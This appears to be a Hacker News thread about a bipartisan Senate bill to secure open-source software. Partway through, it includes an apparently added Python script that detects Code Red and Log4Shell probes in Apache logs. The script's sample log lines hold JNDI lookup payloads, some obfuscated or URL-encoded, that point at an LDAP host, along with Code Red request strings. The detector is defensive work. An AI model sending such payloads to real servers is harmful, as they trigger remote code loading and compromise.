Peters and Hawley Introduce Bipartisan Bill to Help Secure Open Source Software (senate.gov)
40 points by raybb on March 25, 2023 | hide | past | favorite | 23 comments



“This important legislation will, for the first time ever, codify open source software as public infrastructure,” said Trey Herr

Does this mean I can get paid hundreds of millions of dollars to ship upgrades to open source code several years late and with twice as much technical debt as before? Because if so, I'm on board

/s


No part of the bill requires actually securing software, or, like, running scans, or fixing vulns, or anything like that. It's a weird jobs program and mostly just adds bureaucracy.


I'd much rather they spent money hiring people to contribute to securing open source and doing outreach, rather than just some mandatory "software scanning" which generates noisy alerts no one does anything about.

Or neither. Just make a fund to hire talent to work all day hardening OSS projects. Rather than all the new mandatory meetings and oversight.


Forgive me if my bar is too low, but just to see bipartisan efforts at all toward this is a refreshing bright spot in American politics. Let's not make the perfect the enemy of the good.


The Patriot Act was bipartisan; generally, if both parties agree on something, it isn't good for the average American citizen.


When the uniparty wins, the people always lose.


There is mandamus language that directs the DHS Director to "bolster the security of open source software", "support Federal efforts to strengthen the security of open source software", etc. but it's up to the director to determine the methods of doing so.


Flexibility and discretion, imagine that.


It's not practical for Congress to dictate the exact mechanisms for implementation.


Precisely.



Today I learned that we have an Agency for Cybersecurity and Infrastructure Security: https://www.cisa.gov/


[flagged]


^This is vandalism and contributes nothing


You flagged it for "vandalism"? Give me a break.

Sorry I preferred a summary instead of reading entire bills on a Saturday morning.


I wonder what the cyclomatic complexity is of the set of federal laws.


From the perspective of politicians, bugs in the legal code are actually features. The incumbent power structure expends resources paying lawyers to find and exploit them, while the little people are mostly stuck following the law at face value. Most people don't even get to run the interpreter, but get forced into plea bargains and settlements instead! The imbalance helps perpetuate the status quo which lines the politicians' pockets.

Whereas bugs in computer software are problematic because they allow a new type of analyst to gain an outsized advantage, which upsets the status quo. Although the sharp contrast is slowly vanishing as full compromise bugs get rarer and the incumbent power structure employs more and more computer code analysts. For example, look at all of the security vulns in modern browsers and web protocols themselves that leak information to surveillance companies, but get downplayed as mere "privacy" problems that would be nice to fix some day perhaps.


How about just looking at tax law to really juice that average...


My favorite bit of 'tax law': Decades ago I accidentally failed to file a return and ended up needing to compute some interest and penalties when I figured it out a year later. When trying to determine how the computation was done exactly, I found a court case where the IRS petitioned the court to let them approximate the results of this specific computation because applying the rule exactly was too complicated for them!

[I did eventually figure it out.]


They specifically refer to Log4shell. That to me felt like a damp squib.

I remember seeing the Apache logs on my home desktop on my cable modem back in 2001; the default.ida GETs would race through with multiple attempts per hour.

Conversely I saw barely any attempts on my public facing apache servers 20+ years later with log4shell. Was it just me?
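The comparison above, between Code Red-era `default.ida` probes and Log4Shell `${jndi:...}` probes, can be checked mechanically against an Apache access log rather than by eye. The script below is an added example and is not code from this thread, the bill, or any project it names. It parses Apache "combined" format lines, flags `GET /default.ida?` requests and JNDI lookup strings (after URL-decoding and collapsing the common `${lower:x}` / `${::-x}` obfuscations) in the request, referer or user agent, and buckets hits per source host and per hour. The log lines are constructed, the addresses are RFC 5737 documentation ranges, and treating "attempts per hour" as hour-of-day buckets is an assumption.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" format:
#   host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Code Red-style IIS probe: a GET/HEAD for /default.ida with a long query string.
DEFAULT_IDA_RE = re.compile(r'^(?:GET|HEAD) /default\.ida\?', re.IGNORECASE)

# Log4Shell lookup. Scanners commonly wrap single characters in nested lookups,
# e.g. ${${lower:j}ndi:...} or ${${::-j}ndi:...}; OBFUSCATION_RE unwraps those so
# JNDI_RE only has to recognise the plain ${jndi: form.
OBFUSCATION_RE = re.compile(r'\$\{(?:lower|upper):([^}]*)\}|\$\{::-([^}]*)\}', re.IGNORECASE)
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

# Constructed sample log (not real traffic). Documentation IPs only.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Jul/2001:10:04:12 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 276 "-" "-"
203.0.113.7 - - [19/Jul/2001:10:31:55 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 276 "-" "-"
198.51.100.23 - - [19/Jul/2001:11:02:03 +0000] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
198.51.100.42 - - [10/Dec/2021:22:15:41 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"
198.51.100.42 - - [10/Dec/2021:22:16:02 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/b} HTTP/1.1" 200 612 "-" "curl/7.79.1"
198.51.100.42 - - [10/Dec/2021:22:48:19 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fc%7D HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.8 - - [10/Dec/2021:23:01:00 +0000] "POST /login HTTP/1.1" 302 0 "https://example.test/" "Mozilla/5.0"
"""


def deobfuscate(s):
    """Repeatedly unwrap ${lower:x}, ${upper:x} and ${::-x} until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = OBFUSCATION_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def classify(line):
    """Return (kind, host, timestamp) for a parsable line, else None.

    kind is 'code-red-default.ida', 'log4shell-jndi', or None for benign lines.
    """
    m = COMBINED_RE.match(line)
    if not m:
        return None
    req = m.group('request')
    if DEFAULT_IDA_RE.match(req):
        kind = 'code-red-default.ida'
    else:
        # Attackers put the lookup wherever the app might log it; check all three.
        haystack = ' '.join((req, m.group('referer') or '', m.group('ua') or ''))
        kind = 'log4shell-jndi' if JNDI_RE.search(deobfuscate(unquote(haystack))) else None
    ts = datetime.strptime(m.group('time').split()[0], '%d/%b/%Y:%H:%M:%S')
    return kind, m.group('host'), ts


def summarize(log_text):
    """Count probe hits per (kind, hour) and collect the source hosts per kind."""
    per_hour = Counter()
    sources = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hit = classify(line)
        if hit is None or hit[0] is None:
            continue
        kind, host, ts = hit
        per_hour[(kind, ts.strftime('%Y-%m-%d %H:00'))] += 1
        sources[kind].add(host)
    return per_hour, {k: sorted(v) for k, v in sources.items()}


if __name__ == '__main__':
    per_hour, sources = summarize(SAMPLE_LOG)
    for (kind, hour), n in sorted(per_hour.items()):
        print(f'{hour}  {kind:<22} {n} attempt(s)')
    for kind, hosts in sources.items():
        print(f'{kind}: from {", ".join(hosts)}')
```

Run it against a real `access.log` by passing the file contents to `summarize`; the per-hour buckets are what let you compare scan pressure between the two eras. Note that a Log4Shell probe only shows up in the access log if the payload lands in a field Apache logs (URL, referer, user agent); payloads in other headers or POST bodies need the upstream application's logs instead.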


There was at least one federal agency directly breached using it, so that’s probably part of it:

https://www.bleepingcomputer.com/news/security/us-govt-irani...


Hawley is dishonest, and I’m not familiar with Peters; Ron Wyden actually understands these issues, does he have an opinion on this bill?


Agreed. Wyden is my senator so I may be a bit biased, but I'd want to see his involvement in something like this because he's pretty much the only senator that gets this stuff. Reading that blurb it seems kind of ambiguous - it could potentially lead to some bad places if people who don't understand the issues are writing the bill.


Right. Would be more helpful to view this as fraternizing with confederates, not bipartisanship. Anything Hawley touches is tainted by his role as an insurrectionist.



